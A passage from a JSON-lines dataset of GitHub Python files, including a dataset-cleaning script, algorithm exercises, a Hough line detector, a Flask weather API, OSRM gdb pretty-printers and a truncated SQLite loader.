pickle.dump(deleteList,open('deletefiles','wb'))\r\n file = open('C:/Users/LUTAO11/Desktop/deletefiles.txt','w')\r\n for i in deleteList:\r\n #print(type(i))\r\n file.write(i)\r\n file.close()\r\n\r\n # thisf = 'F:/Small_Obstacle_Dataset/train/file_2/image/0000000035.png'\r\n # os.chmod(thisf, stat.S_IRWXO)\r\n # deleteFile(thisf)\r\n\r\n\r\n for i in deleteList:\r\n # os.path.normpath(i)\r\n # i.replace(\"\\\\\", \"/\")\r\n path, name = os.path.split(os.path.normpath(i))\r\n\r\n os.chdir(path)\r\n # 提升权限\r\n os.chmod(name, stat.S_IRWXU)\r\n # os.chmod(name, stat.S_IRWXO)\r\n\r\n print(i)\r\n # PermissionError: [WinError 5] 拒绝访问。: '/'\r\n os.remove(name)\r\n # aPath = r'F:\\Small_Obstacle_Dataset\\train\\seq_6\\labels'\r\n # bPath = r'F:\\Small_Obstacle_Dataset\\train\\seq_6\\image'\r\n # dirCompare(aPath, bPath)\r\n print(\"\\ndone!\")\r\n","repo_name":"LT1st/SmallObstacleDetection","sub_path":"code/utils/clean_dataset.py","file_name":"clean_dataset.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21150575044","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n self.parent = None\n\"\"\"\n\nclass Solution:\n def inorderSuccessor(self, node: 'Node') -> 'Node':\n it = node\n go_up_from_left = False\n go_up_from_right = False\n go_right = False\n\n while not go_right:\n if not go_up_from_right and it.right:\n it = it.right\n go_right = True\n elif it.parent is None:\n return None\n elif it == it.parent.left:\n return it.parent\n else:\n go_up_from_left = False\n go_up_from_right = True\n\n it = it.parent\n\n while it.left:\n it = it.left\n\n return it\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/510. Inorder Successor in BST II/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"10530288428","text":"import random\n\ndef primary():\n # print(\"Keep it logically awesome.\")\n\n #reading all quotes inside file\n f = open(\"quotes.txt\")\n quotes = f.readlines()\n f.close()\n\n #generating quotes randomly from list\n last = len(quotes) - 1\n rnd = random.randint(0,last)\n\n # print(quotes[rnd])\n\n #print two quotes at a time\n print(quotes[random.randint(0,last)], \"\\n\", quotes[random.randint(0,last)])\n #-1 for last value regardless of size\n #list size is 14 so last element index would be 13\n\nif __name__== \"__main__\":\n primary()\n","repo_name":"abarnaks/python-random-quote","sub_path":"get-quote.py","file_name":"get-quote.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29764113920","text":"from os import O_TEMPORARY\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nfrom numpy.core.shape_base import _accumulate\n\n\ndef line_detection_non_vectorized(image, edge_image, num_rhos=180, num_thetas=180):\n edge_height, edge_width = edge_image.shape[:2]\n edge_height_half, edge_width_half = edge_height / 2, edge_width / 2\n #\n d = np.sqrt(np.square(edge_height) + np.square(edge_width))\n dtheta = (180 / num_thetas)\n drho = ((2 * d) / num_rhos)\n #\n thetas = np.arange(0, 180, step=dtheta)\n rhos = np.arange(-d, d, step=drho)\n #\n cos_thetas = np.cos(np.deg2rad(thetas))\n sin_thetas = np.sin(np.deg2rad(thetas))\n #\n accumulator = np.zeros((len(rhos), len(thetas)))\n #\n output_img=np.zeros((edge_height,edge_width)) \n #\n figure = plt.figure(figsize=(12, 12))\n subplot1 = figure.add_subplot(1, 4, 1)\n subplot1.imshow(image)\n subplot2 = figure.add_subplot(1, 4, 2)\n subplot2.imshow(edge_image, cmap=\"gray\")\n subplot3 = figure.add_subplot(1, 4, 3)\n subplot3.set_facecolor((0, 0, 0))\n subplot4 = figure.add_subplot(1, 4, 4)\n subplot4.imshow(output_img)\n #\n for y in range(edge_height):\n for x in range(edge_width):\n if edge_image[y][x] != 0:\n edge_point = [y - edge_height_half, x - edge_width_half]\n ys, xs = [], []\n for theta_idx in range(len(thetas)):\n rho = (edge_point[1] * cos_thetas[theta_idx]) + (edge_point[0] * sin_thetas[theta_idx])\n theta = thetas[theta_idx]\n rho_idx = np.argmin(np.abs(rhos - rho))\n accumulator[rho_idx][theta_idx] += 1\n ys.append(rho)\n xs.append(theta)\n subplot3.plot(xs, ys, color=\"white\", alpha=0.05)\n \n\n out_img=image.copy()\n # for y in range(accumulator.shape[0]):\n # for x in range(accumulator.shape[1]):\n # if accumulator[y][x] > t_count:\n # rho = rhos[y]\n # theta = thetas[x]\n # a = np.cos(np.deg2rad(theta))\n # b = np.sin(np.deg2rad(theta))\n # x0 = (a * rho) + edge_width_half\n # y0 = (b * rho) + edge_height_half\n # x1 = int(x0 + 100 * (-b))\n # y1 = int(y0 + 100 * (a))\n # x2 = int(x0 - 100 * (-b))\n # y2 = int(y0 - 100 * (a))\n # subplot3.plot([theta], [rho], marker='o', color=\"yellow\")\n # subplot4.add_line(mlines.Line2D([x1, x2], [y1, y2],color=\"white\"))\n # out_img=cv2.line(out_img,(x1,y1),(x2,y2),(255,255,255),1) \n indices, top_thetas, top_rhos=peak_votes(accumulator,rhos,thetas,50)\n for i in range(len(indices)):\n rho = top_rhos[i]\n theta = top_thetas[i]\n a = np.cos(np.deg2rad(theta))\n b = np.sin(np.deg2rad(theta))\n x0 = (a * rho) + edge_width_half\n y0 = (b * rho) + edge_height_half\n x1 = int(x0 + 200 * (-b))\n y1 = int(y0 + 200 * (a))\n x2 = int(x0 - 200 * (-b))\n y2 = int(y0 - 200 * (a))\n # subplot3.plot([theta], [rho], marker='o', color=\"yellow\")\n out_img=cv2.line(out_img,(x1,y1),(x2,y2),(0,255,0),1) \n\n\n cv2.imwrite(\"linesOutput2.jpg\",out_img)\n # cv2.imshow(\"output\" ,out_img)\n # cv2.imshow(\"input\",image)\n # cv2.waitKey(0)\n\n # subplot1.title.set_text(\"Original Image\")\n # subplot2.title.set_text(\"Edge Image\")\n # subplot3.title.set_text(\"Hough Space\")\n # subplot4.title.set_text(\"Detected Lines\")\n # plt.show()\n\ndef peak_votes(accumulator, rhos, thetas,n):\n \"\"\" Finds the max number of votes in the hough accumulator \"\"\"\n idx = np.argpartition(accumulator.flatten(), -n)[-n:]\n indices = idx[np.argsort((-accumulator.flatten())[idx])]\n top_rhos = rhos[(indices / accumulator.shape[1]).astype(int)]\n top_thetas = thetas[indices % accumulator.shape[1]]\n\n return indices, top_thetas, top_rhos\n\ndef hough_lines(path):\n image = cv2.imread(path)\n edge_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n edge_image=cv2.GaussianBlur(edge_image,(5,5),1)\n edge_image=cv2.dilate(edge_image,(3,3),iterations=1)\n edge_image = cv2.Canny(edge_image, 100, 200)\n line_detection_non_vectorized(image, edge_image)\n\nif __name__ == \"__main__\":\n hough_lines(\"linesInput2.jpg\")\n\n\n","repo_name":"AhmedAdel21/Computer-Vision","sub_path":"Edge & line Detection/lines_hough.py","file_name":"lines_hough.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33379468382","text":"import shutil\ncolumns = shutil.get_terminal_size().columns\n\ndef Merge(array, copy, low, mid, high):\n k,i = low,low\n j = mid+1\n while i<=mid and j<=high:\n if array[i]<=array[j]:\n copy[k] = array[i]\n i += 1\n k += 1\n else:\n copy[k]=array[j]\n j += 1\n k += 1\n #filling the remaining\n while i<=mid:\n copy[k] = array[i]\n i += 1\n k += 1\n for i in range(low, high+1):\n array[i] = copy[i]\n\ndef MergeSort(array, copy, low, high):\n if low == high:\n return\n mid = (low + ((high-low) >>1))\n #left\n MergeSort(array, copy, low, mid)\n #right\n MergeSort(array, copy, mid+1, high)\n #time to merge!\n Merge(array, copy, low, mid, high)\n\ndef IsSorted(array):\n prev = array[0]\n for i in range(1,n):\n if prev > array[i]:\n print(\"Merge Fails!!\")\n return False\n prev = array[i]\n return True\n\nif __name__==\"__main__\":\n print(\"MERGE SORT\".center(columns))\n\n while True:\n array = input(\"\\nInput the numbers separated by commas: \").split(\",\")\n array = [int(x) for x in array]\n n = len(array)\n copy = array.copy()\n MergeSort(array,copy, 0, n-1)\n\n if IsSorted(array):\n print(array)\n\n ask = input(\"\\nWanna Continue? [y/n]: \").lower()\n if ask == \"y\":\n continue\n elif ask == \"n\":\n exit()\n","repo_name":"CyberSpace-Cowboy/merge-sort","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12880024858","text":"# Import the dependencies.\nfrom flask import Flask, jsonify\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n# Set up the database\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# Reflect the database into new model\nBase = automap_base()\n\n# Reflect the tables from the database into the model\nBase.prepare(engine, reflect=True)\n\n# Save references to tables\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Set up Flask\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return (\n \"SurfsUp Welcome Page

    \"\n \"Available routes are:
    \"\n \"/api/v1.0/precipitation
    \"\n \"/api/v1.0/stations
    \"\n \"/api/v1.0/tobs
    \"\n \"/api/v1.0/
    \"\n \"/api/v1.0//\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= '2016-06-23').all()\n\n precipitation_data = {}\n for date, prcp in results:\n precipitation_data[date] = prcp\n\n return jsonify(precipitation_data)\n\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n session = Session(engine)\n results = session.query(Station.station).all()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n session = Session(engine)\n results = session.query(Measurement.tobs).filter(Measurement.date >= '2016-06-23').filter(Measurement.station == 'USC00519281').all()\n\n tobs_data = [tobs[0] for tobs in results]\n\n return jsonify(tobs_data)\n\n\n@app.route(\"/api/v1.0/\")\ndef temp_stats_start(start):\n session = Session(engine)\n results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start).all()\n\n temp_stats = {\n 'min_temperature': results[0][0],\n 'max_temperature': results[0][1],\n 'avg_temperature': results[0][2]\n }\n\n return jsonify(temp_stats)\n\n\n@app.route(\"/api/v1.0//\")\ndef temp_stats_start_end(start, end):\n session = Session(engine)\n results = session.query(func.min(Measurement.tobs), func.max(Measurement.tobs), func.avg(Measurement.tobs)).filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n\n temp_stats = {\n 'min_temperature': results[0][0],\n 'max_temperature': results[0][1],\n 'avg_temperature': results[0][2]\n }\n\n return jsonify(temp_stats)\n\n\n\nif __name__=='__main__':\n app.run(debug=True, port=5001)\n\n#################################################\n# Flask Routes\n#################################################\n","repo_name":"mavingill/SQL_Alchemy_Challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12045764398","text":"from apps.user.models import Orderdetail,Order,Goods,UserInfo\nclass object:\n picture = ''\n order = Orderdetail\n\n def __init__(self, pic, obj):\n self.picture = pic\n self.order = obj\nclass view:\n Sell=[]\n Buy=[]\n Ing_1=[]\n Ing_2=[]\n\n def __init__(self):\n self.Ing_1=[]\n self.Ing_2=[]\n self.Buy=[]\n self.Sell=[]\n\ndef indexview(c_id):\n\n s_order=Order.objects.filter(seller_id=c_id)#已卖物品\n b_order=Order.objects.filter(buyer_id=c_id)#已买物品\n t_order_1=[]#未收款物品\n t_order_2=[]#未收获物品\n t_view=view\n t_view.__init__(t_view)\n\n for entity in s_order:\n\n if entity.state=='finish':\n order = Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n s_object = object(picture, order)\n t_view.Sell.append(s_object)\n else:\n t_order_1.append(entity)\n\n for entity in b_order:\n\n if entity.state == 'finish':\n order = Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n b_object = object(picture, order)\n t_view.Buy.append(b_object)\n else:\n t_order_2.append(entity)\n\n for entity in t_order_1:\n order = Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n t_object = object(picture, order)\n t_view.Ing_1.append(t_object)\n\n for entity in t_order_2:\n order = Orderdetail.objects.get(order_id=entity.order_id)\n picture = Goods.objects.get(goods_id=order.goods_id).picture\n t_object = object(picture, order)\n t_view.Ing_2.append(t_object)\n return t_view\n\ndef countSelled(c_id):\n return Order.objects.filter(seller_id=c_id).count()\n\ndef not_inorder(name):\n goods=Goods.objects.filter(user_name=name)\n return goods.filter(state=\"not_in_order\")\ndef getincome(c_id):\n income=0\n for order in Order.objects.filter(seller_id=c_id):\n income=income +order.cost\n return income\n\n\n\n\n\n\n","repo_name":"gerayking/BuptFish","sub_path":"apps/user/Service/IndexService.py","file_name":"IndexService.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"30422130800","text":"import gdb.printing\n\n# https://sourceware.org/gdb/onlinedocs/gdb/Pretty-Printing.html\n# https://sourceware.org/gdb/onlinedocs/gdb/Writing-a-Pretty_002dPrinter.html\n\nCOORDINATE_PRECISION = 1e6\ncoord2float = lambda x: int(x) / COORDINATE_PRECISION\nlonlat = lambda x: (coord2float(x['lon']['__value']), coord2float(x['lat']['__value']))\n\ndef call(this, method, *args):\n \"\"\"Call this.method(args)\"\"\"\n if (str(this) == ''):\n raise BaseException('\"this\" is optimized out')\n command = '(*({})({})).{}({})'.format(this.type.target().pointer(), this.address, method, ','.join((str(x) for x in args)))\n return gdb.parse_and_eval(command)\n\ndef iterate(v):\n s, e = v['_M_impl']['_M_start'], v['_M_impl']['_M_finish']\n while s != e:\n yield s.dereference()\n s +=1\n\nclass CoordinatePrinter:\n \"\"\"Print a CoordinatePrinter object.\"\"\"\n def __init__(self, val):\n self.val = val\n\n def to_string(self):\n return '{{{}, {}}}'.format(*lonlat(self.val))\n\nclass TurnInstructionPrinter:\n \"\"\"Print a TurnInstruction object.\"\"\"\n\n modifiers = {0:'UTurn', 1:'SharpRight', 2:'Right', 3:'SlightRight',\n 4:'Straight', 5:'SlightLeft', 6:'Left', 7:'SharpLeft'}\n types = {0:'Invalid', 1:'NewName', 2:'Continue', 3:'Turn', 4:'Merge', 5:'OnRamp',\n 6:'OffRamp', 7:'Fork', 8:'EndOfRoad', 9:'Notification', 10:'EnterRoundabout',\n 11:'EnterAndExitRoundabout', 12:'EnterRotary', 13:'EnterAndExitRotary',\n 14:'EnterRoundaboutIntersection', 15:'EnterAndExitRoundaboutIntersection',\n 16:'UseLane', 17:'NoTurn', 18:'Suppressed', 19:'EnterRoundaboutAtExit',\n 20:'ExitRoundabout', 21:'EnterRotaryAtExit', 22:'ExitRotary',\n 23:'EnterRoundaboutIntersectionAtExit', 24:'ExitRoundaboutIntersection',\n 25:'StayOnRoundabout', 26:'Sliproad'}\n\n def __init__(self, val):\n self.val = val\n\n def to_string(self):\n t, m = int(self.val['type']), int(self.val['direction_modifier'])\n m = '%s (%d)' % (self.modifiers[m], m) if m in self.modifiers else str(m)\n t = '%s (%d)' % (self.types[t], t) if t in self.types else str(t)\n return '{{type = {}, direction_modifier = {}}}'.format(t, m)\n\nclass TurnLaneDataPrinter:\n \"\"\"Print a TurnLaneData object.\"\"\"\n\n mask = {0:'Empty', 1:'None', 2:'Straight', 4:'SharpLeft', 8:'Left', 16:'SlightLeft',\n 32:'SlightRight', 64:'Right', 128:'SharpRight', 256:'UTurn', 512:'MergeToLeft',\n 1024:'MergeToRight'}\n\n def __init__(self, val):\n self.val = val\n\n def to_string(self):\n tg = int(self.val['tag'])\n fr, to = int(self.val['from']), int(self.val['to'])\n return '{{tag = {}, from = {}, to = {}}}'.format(self.mask[tg] if tg in self.mask else tg, fr, to)\n\ndef build_pretty_printer():\n pp = gdb.printing.RegexpCollectionPrettyPrinter('OSRM')\n pp.add_printer('TurnInstruction', '::TurnInstruction$', TurnInstructionPrinter)\n pp.add_printer('Coordinate', '::Coordinate$', CoordinatePrinter)\n pp.add_printer('TurnLaneData', '::TurnLaneData$', TurnLaneDataPrinter)\n return pp\n\n## unregister OSRM pretty printer before (re)loading\ngdb.pretty_printers = [x for x in gdb.pretty_printers if not isinstance(x, gdb.printing.RegexpCollectionPrettyPrinter) or x.name != 'OSRM']\ngdb.printing.register_pretty_printer(gdb.current_objfile(), build_pretty_printer())\n\nimport geojson\nimport os\nimport time\nimport tempfile\nimport urllib.parse\nimport webbrowser\nimport re\n\nclass GeojsonPrinter (gdb.Command):\n \"\"\"Display features on geojson.io.\"\"\"\n\n def __init__ (self):\n super (GeojsonPrinter, self).__init__ ('geojson', gdb.COMMAND_USER)\n self.to_geojson = {\n 'osrm::engine::guidance::RouteSteps': self.RouteSteps,\n 'std::vector >': self.RouteSteps}\n\n @staticmethod\n def encodeURIComponent(s):\n return urllib.parse.quote(s.encode('utf-8'), safe='~()*!.\\'')\n\n @staticmethod\n def RouteSteps(steps):\n k, road, result = 0, [], []\n for step in iterate(steps):\n maneuver, location = step['maneuver'], step['maneuver']['location']\n ll = lonlat(location)\n road.append(ll)\n\n properties= {field.name: str(step[field.name]) for field in step.type.fields() if str(step[field.name]) != '\"\"'}\n properties.update({'maneuver.' + field.name: str(maneuver[field.name]) for field in maneuver.type.fields()})\n properties.update({'stroke': '#0000ff', 'stroke-opacity': 0.8, 'stroke-width': 15})\n result.append(geojson.Feature(geometry=geojson.LineString([ll, ll]), properties=properties))\n\n road = geojson.Feature(geometry=geojson.LineString(road), properties={'stroke': '#0000ff', 'stroke-opacity': 0.5, 'stroke-width':5})\n return [road, *result]\n\n def invoke (self, arg, from_tty):\n try:\n val = gdb.parse_and_eval(arg)\n features = self.to_geojson[str(val.type)](val)\n request = self.encodeURIComponent(str(geojson.FeatureCollection(features)))\n webbrowser.open('http://geojson.io/#data=data:application/json,' + request)\n except KeyError as e:\n print ('no GeoJSON printer for: ' + str(e))\n except gdb.error as e:\n print('error: ' % (e.args[0] if len(e.args)>0 else 'unspecified'))\n return\n\nGeojsonPrinter()\n\n\n\nclass SVGPrinter (gdb.Command):\n \"\"\"\n Generate SVG representation within HTML of edge-based graph in facade.\n SVG image contains:\n - thick lines with arrow heads are edge-based graph nodes with forward (green) and reverse (red) node IDs (large font)\n - segments weights are numbers (small font) in the middle of segments in forward (green) or reverse (red) direction\n - thin lines are edge-based graph edges in forward (green), backward (red) or both (yellow) directions with\n weights, edge-based graph node IDs (source, targte) and some algorithm-specific information\n - coordinates of segments end points (node-based graph nodes)\n \"\"\"\n\n def __init__ (self):\n super (SVGPrinter, self).__init__ ('svg', gdb.COMMAND_USER)\n self.re_bbox = None\n self.to_svg = {\n 'const osrm::engine::datafacade::ContiguousInternalMemoryDataFacade &': self.Facade,\n 'const osrm::engine::datafacade::ContiguousInternalMemoryDataFacade &': self.Facade,\n 'osrm::engine::routing_algorithms::Facade': self.Facade,\n 'osrm::engine::DataFacade': self.Facade}\n\n\n @staticmethod\n def show_svg(svg, width, height):\n svg = \"\"\"\n\n\n \n\n\n \n \n \n \n\n \n \n \n\n \n \n \n \n\"\"\" + svg + '\\n'\n fd, name = tempfile.mkstemp('.html')\n os.write(fd, svg.encode('utf-8'))\n os.close(fd)\n print ('Saved to ' + name)\n webbrowser.open('file://' + name)\n\n @staticmethod\n def getByGeometryId(facade, id, value):\n return call(facade, 'GetUncompressed' + ('Forward' if id['forward'] else 'Reverse') + value, id['id'])\n\n @staticmethod\n def getNodesInBoundingBox(facade, bbox):\n nodes, longitudes, latitudes = set(), set(), set()\n for node in range(call(facade, 'GetNumberOfNodes')):\n geometry = SVGPrinter.getByGeometryId(facade, call(facade, 'GetGeometryIndex', node), 'Geometry')\n node_longitudes, node_latitudes, in_bbox = set(), set(), False\n for nbg_node in iterate(geometry):\n lon, lat = lonlat(call(facade, 'GetCoordinateOfNode', nbg_node))\n node_longitudes.add(lon)\n node_latitudes.add(lat)\n in_bbox = in_bbox or bbox[0] <= lon and lon <= bbox[2] and bbox[1] <= lat and lat <= bbox[3]\n if in_bbox:\n nodes.add(node)\n longitudes.update(node_longitudes)\n latitudes.update(node_latitudes)\n return nodes, longitudes, latitudes\n\n @staticmethod\n def Facade(facade, width, height, arg):\n\n result = ''\n\n ## parse additional facade arguments\n re_float = '[-+]?[0-9]*\\.?[0-9]+'\n bbox = re.search('(' + re_float + '),(' + re_float + ');(' + re_float + '),(' + re_float +')', arg)\n bbox = [float(x) for x in bbox.groups()] if bbox else [-180, -90, 180, 90]\n mld_level = re.search('L:([0-9]+)', arg)\n mld_level = int(mld_level.group(1)) if mld_level else 0\n\n marginx, marginy = 75, 75\n INVALID_SEGMENT_WEIGHT, MAX_SEGMENT_WEIGHT = gdb.parse_and_eval('INVALID_SEGMENT_WEIGHT'), gdb.parse_and_eval('INVALID_SEGMENT_WEIGHT')\n segment_weight = lambda x: str(x) + (' invalid' if x == INVALID_SEGMENT_WEIGHT else ' max' if x == MAX_SEGMENT_WEIGHT else '')\n\n if mld_level > 0:\n mld_facade = facade.cast(gdb.lookup_type('osrm::engine::datafacade::ContiguousInternalMemoryAlgorithmDataFacade'))\n mld_partition = mld_facade['mld_partition']\n mld_levels = call(mld_partition, 'GetNumberOfLevels')\n if mld_level < mld_levels:\n sentinel_node = call(mld_partition['partition'], 'size') - 1 # GetSentinelNode\n number_of_cells = call(mld_partition, 'GetCell', mld_level, sentinel_node) # GetNumberOfCells\n result += \"\"\n for cell in range(number_of_cells):\n result += \"\"\"\n\"\"\" \\\n .format(cell, int(256 * cell / number_of_cells))\n result += \"\\n\"\n else:\n mld_level = 0\n else:\n mld_levels = 0\n\n ## get nodes\n nodes, longitudes, latitudes = SVGPrinter.getNodesInBoundingBox(facade, bbox)\n if len(nodes) == 0:\n return ''\n\n ## create transformations (lon,lat) -> (x,y)\n minx, miny, maxx, maxy = min(longitudes), min(latitudes), max(longitudes), max(latitudes)\n if abs(maxx - minx) < 1e-8:\n maxx += (maxy - miny) / 2\n minx -= (maxy - miny) / 2\n if abs(maxy - miny) < 1e-8:\n maxy += (maxx - minx) / 2\n miny -= (maxx - minx) / 2\n tx = lambda x: marginx + (x - minx) * (width - 2 * marginx) / (maxx - minx)\n ty = lambda y: marginy + (maxy - y) * (height - 2 * marginy) / (maxy - miny)\n t = lambda x: str(tx(x[0])) + ',' + str(ty(x[1]))\n\n print ('Graph has {} nodes and {} edges and {} nodes in the input bounding box {},{};{},{} -> {},{};{},{}'\n .format(call(facade, 'GetNumberOfNodes'), call(facade, 'GetNumberOfEdges'), len(nodes), *bbox, minx, miny, maxx, maxy))\n\n for node in nodes:\n geometry_id = call(facade, 'GetGeometryIndex', node)\n direction = 'forward' if geometry_id['forward'] else 'reverse'\n print (geometry_id, direction)\n geometry = SVGPrinter.getByGeometryId(facade, geometry_id, 'Geometry')\n weights = SVGPrinter.getByGeometryId(facade, geometry_id, 'Weights')\n\n\n\n ## add the edge-based node\n ref = 'n' + str(node)\n cell_background = ' filter=\"url(#cellid-{})\"'.format(call(mld_partition, 'GetCell', mld_level, node)) if mld_level > 0 else ''\n result += ''\n result += '' + str(node) + '\\n'\n\n ## add segments with weights\n geometry_first = geometry['_M_impl']['_M_start']\n for segment, weight in enumerate(iterate(weights)):\n ref = 's' + str(node) + '.' + str(segment)\n fr = lonlat(call(facade, 'GetCoordinateOfNode', geometry_first.dereference()))\n to = lonlat(call(facade, 'GetCoordinateOfNode', (geometry_first+1).dereference()))\n if fr == to:\n ## node penalty on zero length segment (traffic light)\n result += '' \\\n + '🚦 ' + segment_weight(weight) + '\\n'\n else:\n ## normal segment\n result += ''\\\n + ''\\\n + '' \\\n + segment_weight(weight) + '\\n'\n geometry_first += 1\n\n ## add edge-based edges\n s0, s1 = geometry['_M_impl']['_M_start'].dereference(), (geometry['_M_impl']['_M_start'] + 1).dereference()\n for edge in []: # range(call(facade, 'BeginEdges', node), call(facade, 'EndEdges', node)): adjust to GetAdjacentEdgeRange\n target, edge_data = call(facade, 'GetTarget', edge), call(facade, 'GetEdgeData', edge)\n direction = 'both' if edge_data['forward'] and edge_data['backward'] else 'forward' if edge_data['forward'] else 'backward'\n target_geometry = SVGPrinter.getByGeometryId(facade, call(facade, 'GetGeometryIndex', target), 'Geometry')\n t0, t1 = target_geometry['_M_impl']['_M_start'].dereference(), (target_geometry['_M_impl']['_M_start'] + 1).dereference()\n\n ## the source point: the first node of the source node's first segment\n s0x, s0y = lonlat(call(facade, 'GetCoordinateOfNode', s0))\n\n ## the first control point: the node orthogonal to the first segment at the middle of the segment and offset distance length / 4\n s1x, s1y = lonlat(call(facade, 'GetCoordinateOfNode', s1))\n d0x, d0y = s1x - s0x, s1y - s0y\n c0x, c0y = s0x + d0x /2 - d0y /4, s0y + d0y / 2 + d0x /4\n\n ## the end point: middle of the first segment of the target node\n t0x, t0y = lonlat(call(facade, 'GetCoordinateOfNode', t0))\n t1x, t1y = lonlat(call(facade, 'GetCoordinateOfNode', t1))\n d1x, d1y = t1x - t0x, t1y - t0y\n e1x, e1y = t0x + d1x / 2, t0y + d1y / 2\n\n ## the second control point: the first node of the target's node first segment\n c1x, c1y = t0x, t0y\n\n ref = 'e' + str(edge)\n edge_arrow = ('↔' if edge_data['backward'] else '→') if edge_data['forward'] else ('←' if edge_data['backward'] else '?')\n text = str(node) + edge_arrow + str(target) + ' ' + str(edge_data['weight']) \\\n + (', shortcut' if 'shortcut' in set([x.name for x in edge_data.type.target().fields()]) and edge_data['shortcut'] else '')\n result += ''\\\n + ''\\\n + '' \\\n + text + '\\n'\n result += '\\n\\n'\n\n ## add longitudes and latitudes\n for lon in longitudes:\n result += '' + str(lon) + '\\n'\n for lat in latitudes:\n result += '' + str(lat) + '\\n'\n return result\n\n def invoke (self, arg, from_tty):\n try:\n argv = arg.split(' ')\n if len(argv) == 0 or len(argv[0]) == 0:\n print ('no argument specified\\nsvg [BOUNDING BOX west,south;east,north] [SIZE width,height] [L:MLD level]')\n return\n val = gdb.parse_and_eval(argv[0])\n dims = re.search('([0-9]+)x([0-9]+)', arg)\n width, height = [int(x) for x in dims.groups()] if dims else (2100, 1600)\n type = val.type.target().unqualified() if val.type.code == gdb.TYPE_CODE_REF else val.type\n svg = self.to_svg[str(type)](val, width, height, arg)\n self.show_svg(svg, width, height)\n except KeyError as e:\n print ('no SVG printer for: ' + str(e))\n except gdb.error as e:\n print('error: ' % (e.args[0] if len(e.args)>0 else 'unspecified'))\n\nSVGPrinter()\n","repo_name":"Project-OSRM/osrm-backend","sub_path":"scripts/gdb_printers.py","file_name":"gdb_printers.py","file_ext":"py","file_size_in_byte":19296,"program_lang":"python","lang":"en","doc_type":"code","stars":5806,"dataset":"github-code","pt":"37"} +{"seq_id":"22280173367","text":"import os\nimport logging\nimport functools\nfrom pathlib import Path\n\nfrom typing import Dict, List\nfrom sqlalchemy import create_engine, inspect, Table\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.schema import CreateSchema\nfrom sqlalchemy import exc\n\nfrom target_sqlite.utils.error import SchemaUpdateError\n\n\n# Map sqlalchemy types to SQLite Types\n# Required for two reasons:\n# 1. Compare the sqlalchemy Table definition to what is defined in SQLite\n# 2. Use the type to manually execute an ALTER TABLE for updating or\n# adding new columns\nMAP_SQLALCHEMY_TO_SQLITE_TYPE = {\n \"BIGINT\": \"INTEGER\",\n \"FLOAT\": \"REAL\",\n \"VARCHAR\": \"TEXT\",\n \"BOOLEAN\": \"INTEGER\",\n \"TIMESTAMP\": \"TEXT\",\n}\n\n\nclass SQLiteLoader:\n def __init__(self, table: Table, config: Dict) -> None:\n self.table = table\n self.database_path = Path(config[\"database\"]).with_suffix(\".db\")\n\n self.engine = create_engine(f\"sqlite:///{self.database_path}\")\n listen(self.engine, \"first_connect\", self.enable_wal)\n\n def enable_wal(cls, conn, conn_record):\n cursor = conn.cursor()\n cursor.execute(\"PRAGMA journal_mode=WAL\")\n cursor.close()\n\n def attribute_names(self) -> List[str]:\n \"\"\"\n Get the attribute(column) names for the associated Table\n \"\"\"\n return [column.name for column in self.table.columns]\n\n def empty_record(self) -> Dict:\n \"\"\"\n Get a dictionary representing an empty (all attributes None) record for\n the table associated with this SQLiteLoader instance.\n\n Used as a template in order to normalize (map) all imported records to\n the full schema they are defined for.\n\n Important for records with multiple optional attributes that are not\n always there, like for example Multi Level JSON objects that are\n flattened before uploaded to SQLite.\n\n Guards against sqlalchemy errors for missing required values for\n bind parameters.\n \"\"\"\n return dict.fromkeys(column.name for column in self.table.columns)\n\n def schema_apply(self) -> None:\n \"\"\"\n Apply the schema defined for self.table to the Database we connect to\n \"\"\"\n inspector = inspect(self.engine)\n\n all_table_names = inspector.get_table_names(self.table.schema)\n if not (self.table.name in all_table_names):\n logging.debug(f\"Table {self.table.name} does not exist -> creating it \")\n self.table.create(self.engine)\n else:\n # There is an existing Table: Check if a schema update is required\n self.schema_update(inspector)\n\n def 